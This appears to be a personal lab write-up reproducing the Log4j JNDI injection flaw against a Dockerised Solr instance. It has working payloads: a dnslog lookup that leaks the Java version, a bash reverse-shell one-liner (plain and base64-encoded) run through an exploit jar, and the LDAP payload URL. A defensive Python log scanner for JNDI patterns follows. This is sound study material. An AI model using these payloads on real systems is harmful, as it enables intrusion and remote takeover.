1. Vulnerability Details
Affected versions: Apache Log4j 2.x <= 2.14.1
Apache Log4j is a logging library for Java that supports starting remote log servers.
JNDI injection vulnerability
JNDI (Java Naming and Directory Interface) is a set of application programming interfaces that gives developers a single, uniform interface for finding and accessing resources such as users, networks, machines, objects and services. Underneath, JNDI supports RMI remote objects, so services registered with RMI can be accessed and invoked through the JNDI interface. When the JNDI interface is initialized, an RMI URL can be passed in as a parameter, and JNDI injection occurs in the client's lookup() function. If the parameter passed to lookup() is attacker-controlled, the application can be attacked: once Log4j records user-supplied data that contains such a lookup, the injection is triggered and can lead to remote code execution.
Format:
${jndi:rmi://127.0.0.1:1099/a}
This means the variable's content is fetched from rmi://127.0.0.1:1099/a through the JNDI lookup function.
2. Reproduction process
Build the Docker environment
docker-compose up -d
docker-compose ps
Access the port
Get a temporary domain name from dnslog
Construct the payload
http://192.168.239.128:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.wujr3s.dnslog.cn}
Refresh dnslog
You can see that the Java version is returned, i.e. the ${sys:java.version} lookup was resolved successfully
Reverse shell
Start the listener
Download the exploit jar file JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
git clone https://github.com/bkfish/Apache-Log4j-Learning.git
# bash reverse shell command
bash -i >& /dev/tcp/192.168.239.128/19999 0>&1
Encode it with base64
Note that you must be in the correct directory here!! Otherwise it will throw an error
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS4xMjgvMTk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.239.128"
We use the generated payload
Here I chose the second one; they are actually all the same
Construct the payload
http://192.168.239.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.239.128:1389/n4fk6l}
Press Enter!
The listener has received the connection
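As an added example that is not part of the original write-up, the following Python scanner checks access-log lines for the JNDI lookup pattern behind the payloads above, including the nested ${sys:...} form as well as URL-encoded and ${lower:...}/${::-...}-wrapped variants; the log lines, client IP and hostnames are constructed.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not from the original page). Lines 2 and 3
# mirror the write-up's two payload shapes; 4 and 5 are obfuscated variants.
SAMPLE_LOG = """\
192.168.239.1 - - "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200
192.168.239.1 - - "GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.wujr3s.dnslog.cn} HTTP/1.1" 200
192.168.239.1 - - "GET /solr/admin/cores?action=${jndi:ldap://192.168.239.128:1389/n4fk6l} HTTP/1.1" 200
192.168.239.1 - - "GET /solr/admin/cores?action=${${lower:j}ndi:rmi://192.168.239.128:1099/a} HTTP/1.1" 200
192.168.239.1 - - "GET /solr/admin/cores?action=%24%7Bjndi%3Aldap%3A//192.168.239.128%3A1389/n4fk6l%7D HTTP/1.1" 200
"""

# Wrapper lookups Log4j 2 resolves before the jndi: lookup runs; a scanner must
# collapse them too: ${lower:j} -> j, ${::-j} or ${env:NOPE:-j} -> j.
_WRAPPERS = [
    (re.compile(r"\$\{(?:lower|upper):([^${}]*)\}"), r"\1"),
    (re.compile(r"\$\{[^${}]*:-([^${}]*)\}"), r"\1"),
]
# Outermost ${...} allowing one nested level, so ${sys:java.version} stays inside.
_LOOKUP = re.compile(r"\$\{((?:[^{}]|\$\{[^{}]*\})*)\}")
_JNDI = re.compile(r"jndi:(\w+):/*(.*)", re.IGNORECASE | re.DOTALL)


def normalize(text: str) -> str:
    """Undo URL-encoding and peel wrapper lookups until nothing changes."""
    text, prev = urllib.parse.unquote(text), None
    while prev != text:
        prev = text
        for pattern, repl in _WRAPPERS:
            text = pattern.sub(repl, text)
    return text

def find_jndi(line: str) -> list:
    """Return (scheme, target) for every JNDI lookup in one log line."""
    hits = []
    for body in _LOOKUP.findall(normalize(line)):
        m = _JNDI.match(body)
        if m:
            hits.append((m.group(1).lower(), m.group(2)))
    return hits

def scan(log: str) -> dict:
    """Map line number -> JNDI lookups for every log line that carries one."""
    return {n: h for n, line in enumerate(log.splitlines(), 1) if (h := find_jndi(line))}

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(f"line {n}: {hits}")
```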
3. Summary
I got stuck for quite a while on the reverse shell part; at first I didn't understand what I was supposed to do. My skills are clearly still lacking.
Off to bed, off to bed; tomorrow is another day of learning.
good good study, day day up.